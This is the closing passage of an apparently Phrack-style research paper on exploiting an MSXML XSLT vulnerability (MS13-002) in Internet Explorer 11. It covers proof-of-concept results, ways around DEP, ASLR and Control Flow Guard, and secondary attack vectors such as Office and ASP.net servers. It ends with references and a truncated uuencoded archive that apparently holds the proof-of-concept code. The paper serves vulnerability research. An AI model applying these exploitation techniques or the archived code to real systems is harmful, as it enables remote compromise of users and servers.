On my testing boxes, the final proof-of-concept code yields a self-patch in 25% of test cases, a fallback control in 50% of cases, and the inevitable crash in 25% of cases. This result agrees with the theoretical expectation of the maximal possible gain from the offset translation approach. The previous code-execution only proof-of-concept code should yield EIP control in 100% of test cases.

--[ 5 - Further work

Taking the bug to arbitrary code execution is considered out of scope for this paper, but let's review the state of the art.

Although the bug itself allows for full control over the program counter, as was shown with the proof-of-concept provided in section 3.7, such a possibility is inherently burdened with two factors:

1. A heap spray is required due to the entropic nature of the bug, which makes the pc control less reliable, if not...

2. ...if not impossible, in the case of 64-bit systems with memory too wide to spray.

A few years ago a browser EIP control would be considered a 'game end'. But today it's just the beginning of a completely different game, or rather, of two different games: mitigations bypass for a sandboxed code execution, and a sandbox bypass for the arbitrary code execution.

In this game, Internet Explorer 11 is possibly the 2nd best hardened popular product, after Google Chrome. Each major version of IE in the past years has introduced a major improvement to the system of security mitigations, up to the point when Microsoft was able to back and test the state of the product security with a $100k Bypass bounty, which says a lot. Another important indicator is the statistics for real IE11 exploits that may be observed both ITW (in the wild) and in metasploit, which are pretty scarce.
Among the dozens of mitigations included in the modern IE[4], many old mitigations have become largely irrelevant, along with the corresponding classes of bugs that were gradually audited out of existence (such as buffer overflows and the corresponding GS stack cookie mitigation). On the other hand, the newer mitigations for more realistic classes of bugs such as Use-after-free are still too weak, e.g. the IsolatedHeap which is only selectively relevant to certain bugs, or MemoryProtection which includes the side-walks allowing to bypass it in practice[5]. The new Control Flow Guard included in Windows 8.1 has been bypassed both in the wild and in research[6] even before its full backward deployment on the still-popular systems like Windows 7. Only two mitigations before the sandbox are universally frustrating for a binary researcher regardless of a bug class: DEP strictly in conjunction with a forced ASLR. The ForceASLR mitigation was introduced in IE10, and wiped a whole class of easy and reliable DEP+ASLR bypass techniques which relied upon both system and 3rd party DLLs compiled without the explicit support for ASLR, allowing for constructing an executable ROP chain with pieces of their code at known addresses. Another opportunity that allowed to bypass DEP+ASLR in a generic way was utilizing executable memory pages generated by 'Just in time' compiler of Adobe Flash.[7] This technique had been mitigated early on, although it's not clear whether it's completely dead. In any case, it is limited due to the Adobe Flash dependency. 
The main[stream] technique used today to bypass DEP+ASLR is to leak some information about the process address space via a memory-leaking opportunity, typically a forced memory leak with a memory corruption vulnerability.[8] The most common way observed to force a memory leak is to corrupt a client-readable object in a certain way allowing for removal of the reading limits: such as a BSTR string in JavaScript (which is said to be removed from jscript9.dll with IE9 but can still be accessed in IE11[9]), various arrays in JavaScript and the Vector object in Flash. To achieve such a bypass, either a second vulnerability must be used, or in some cases, the same vulnerability can provide both a code execution and a memory leaking opportunity.

Another branch of research worthy of notice is the class of 'lazy' arbitrary code executions introduced by Chinese researchers[10], which takes a write-what-where vulnerability condition to enable a privileged JavaScript execution instead of dealing with shell codes. This is not a bypass technique on its own, because it still relies on a memory read/write vulnerability that can provide a memory leak anyway, but rather an example of minimalist goal-oriented thinking as opposed to the overcomplicated fighting with complications.

Jumping back to our bug, it is important to highlight that, because the target software is a global system framework rather than a direct attack surface, IE might be the worst possible attack vector. Instead, one might want to focus on covering a number of secondary vectors that are less constrained with mitigations (e.g. Microsoft Office, for which an ASLR bypass should not be an issue). As was shown in the table in section 2.2, it's possible to trigger the bug in Office 2007 via an embedded JavaScript. Another possibility worth mentioning is that MS Word has a poorly documented functionality for using XML templates with XSL transformation functionality, which might be a vector as well.
And most importantly, many internet-facing web applications based on ASP.net might be vulnerable, possibly to a no-user-interaction code execution on a Windows server.

--[ 6 - Conclusion

In this paper we have thoroughly analyzed and demonstrated a certain control over a curious specimen of a critical modern vulnerability in a core Microsoft product, which somehow remained undercover for 2 years despite the publicly available trigger. We have also introduced a few bits of previously unpublished information concerning MSXML internals, JavaScript 9 internals, heap spraying with images as well as general heap spraying in the latest Internet Explorer.

In order to analyze and control a modern binary vulnerability, a set of distinct operations is applied, all of which we have revisited: impact vectors research, crash dump analysis, exploitability estimation, patch binary analysis, and root cause analysis.

A seemingly uninteresting bug, previously discarded by automated tools and superficial analysis, may turn out to be exploitable as a result of an all-round investigation.

There may exist a multitude of ways to remotely reach a particular vulnerability, apart from the most obvious (and likely the most constrained) attack vector.

Deducing any specific vulnerability details from a vulnerability patch only, such as the triggering inputs or the root cause, may be extremely hard or impossible due to both the binary diffing complexities of large amounts of binary code modifications and the possibility of seemingly irrelevant code being changed.

A bit-accurate precision of the crafted input may be required to take a vulnerability condition such as a read access violation to the control of the program counter through the chain of code constraints along the execution path, as well as an extensive grasp of the operating system internals and a pages-accurate control of the target process memory space.
Bits of useful data may be leaked about the crashing context through
ordinary memory access operations, even when no explicit information
leaking opportunity is provided by the vulnerability.

Internet Explorer 11 memory may be filled quickly with controlled data that
would be positioned predictably enough to control a highly entropic
vulnerability, despite the allocation randomization as well as the possible
anti-heap-spraying mechanisms in place.

Microsoft XSLT technology is implemented as a simple virtual machine,
taking the input XSL code through the abstract syntax tree generation with
the ASTCodeGen class to 'XCode' compilation with the XCodeGen class, to
stateful frame-based computation with the XEngine class.

A huge memory spray may be contained in bitmaps, compressed into the PNG
format with zero loss.

A memory leaking opportunity will be required to take the vulnerability
from EIP control to shellcode execution.


--[ 7 - Thanks

Nicolas for publishing the repro trigger, my ex-boyfriend for the endless
supply of cat photos and Nutella, and my grandma for her loving support.


--[ 8 - References

[1] Microsoft Security Bulletin MS13-002 - Critical - TechNet
    https://technet.microsoft.com/library/security/ms13-002

[2] Nicolas Gregoire, "Mutation-based fuzzing of XSLT engines"
    http://www.agarri.fr/kom/archives/2013/02/25/mutation-based_fuzzing_of_xslt_engines/index.html

[3] Greg MacManus, Michael Sutton, "Punk Ode: Hiding Shellcode in Plain
    Sight"
    https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Sutton.pdf

[4] Ken Johnson, Matt Miller, "Exploit mitigation improvements in
    Windows 8"
    https://media.blackhat.com/bh-us-12/Briefings/M_Miller/BH_US_12_Miller_Exploit_Mitigation_Slides.pdf

[5] Yuki Chen, "The Birth of a Complete IE11 Exploit Under the New Exploit
    Mitigations"
    https://www.syscan.org/index.php/download/

[6] Zhang Yunhai, "Bypass Control Flow Guard comprehensively"
    https://www.blackhat.com/docs/us-15/materials/us-15-Zhang-Bypass-Control-Flow-Guard-Comprehensively-wp.pdf

[7] Dion Blazakis, "Interpreter Exploitation. Pointer Inference and JIT
    Spraying"
    http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf

[8] Fermin J.
Serna, "The info leak era on software exploitation" https://media.blackhat.com/bh-us-12/Briefings/Serna/ BH_US_12_Serna_Leak_Era_Slides.pdf [9] Yang Yu, "Write Once, Pwn Anywhere" https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once- Pwn-Anywhere.pdf [10] Yuki Chen, "Exploit IE using scriptable ActiveX controls" http://www.slideshare.net/xiong120/exploit-ie-using-scriptable- active-x-controls-version-english --[ 9 - Code begin 644 code.tar.gz M'XL(`!:!EE4``^U9VV[;1A#-JP+X'\8"VI!Q)5Y$2;9U*0+D,6X>FH<`01"L MR*7$A!=UN;(D%/F(YHL[LTOJXMBQG4"NV^XQ8"[W,C,[,SM[)(59Y#PY,%S7 M[??[H)Z]KGJZ?J"?%<#SNT$WZ/>[K@^NY[O]X`ET#VT885%*)M`4EB8E^\8\ MG!;'WQBO]K%Y_DL08OPE+V7[8WDP';?%O^][=?R[W6Z`\>\$OO<$W(-9M(/_ M>?R!L"K3L,@ES^7HV1!?SDNY3GDYXUS"*DOS\AP[1\V9E/-SQUDNE^UEIUV( MJ>.=G9TY;W]_Y;P1+"_C0F1-N.2B3(I\U/3:;G.LQ$F>S5,F.>0LXZ-FQI+\ M0]W7A(S)<#9J.M5DE-+B+)Q!R5,>RE'S>37`YO-TW:K7E^;4$O;[GS\;'#TM%&*\(W@?)3S);P(97+)W[Z>?$2[ MK.9%B;[QVR]?7[PLPD6&WFOW<,LV+4-1\D?6M=."16\O7EG;T-@[YK1E[>_? MBHA;]2J:G?\>U7]S_@^/L`Q%,I=P MZ#O`X'$BX0>G?_?B?YW`Q?/O]?V>X7\/`8R_"'E[)K/T8#INB;_?[74V_,]W M*?X=O`!,_7\(#(^C(I3K.0=*@?'1T^'FR5F$3VSI*T*UXT4>$F<"Q1DL&XZ> M_JEIBR&0UQ+(QT"_Z\".O0.PX<'Q_#R6S.0/`_ M%HG@$?6HD76,JBD3>`9#A2:[%U.?H&3<0,!EFH+I^&DQ@L7$G*?*W,"6P@%S9H/3WT',M*G@%PW:<$Z[<]6>E!]5 M9N$FH$)#<+D0.7A57^,S3=W84XWF\'Q7`;3`(R%HP=#9%*^ALZUHDR):0Y'3 M"1DUMRL[KCUHXHS&D$X!)#C(]+M#':H5Q;D:F%0#^$["H^12=0M>TJ'!BN-@ ME];FD#IM`=76?[KD[P'O?RR3<6M.1>U`-."6^S_H!<'F_O<4_PMZ7?/]SX/` MW/_F_K_W_4\50Q6,'V(!-Y&`1\D!Z):4PK64VY)\:K?&^.ZI_WYKO+DN:1U> MM*S==E>!VVY#:TSOIYW3%6+[MD;0FW(C%&+WPJW,FT_6F'?JWCY5]F`BKF&9 MR!EDO)Z#-O@35M(\2RT8#OW`/JG;7H\N8\?12I4G4%#*\@CW`!AKD#..;L8\ M9BF*S0JQ!A:&O"QW-)`1RH*0I>&"CD,$L2@RM7C.IAR*."ZYW"[Q[[\$)Z;[ M7$;[DIJU[VY@*)60B*>2:8=U7*T=Z0DJQNUB6F;%);9I)9\*/J5#3<9XI503 MJ.WC<\\)P`1GI7)ZDE>V2[0@URE!':A"50'TWR21N&*">M`&CYR-RV%1:K4\ M1W^'6FFY4.+C10I>2\4YP^LG3:8YCZZ&X6X,5`U_J*Q#)R"/_$D;H1R1Y!%? 
MT7DJE/YP(006!!4)S04I+;C\4D*<8!R4C7,\;R!9DNJDP_1+\KT04,BV]';\ M%;U%FC0:4MR1=\4!%:Q2)USEI;?[3@%$Z`#C<^5)[8>GV5JWM3@WIJ"RPU5U-Q MVZYY,Q6:&\)UCD0T32$8;)0O M,?/A!O5(0)'-:B?7L=IP>#)@N],A>;/ONO9U&JNR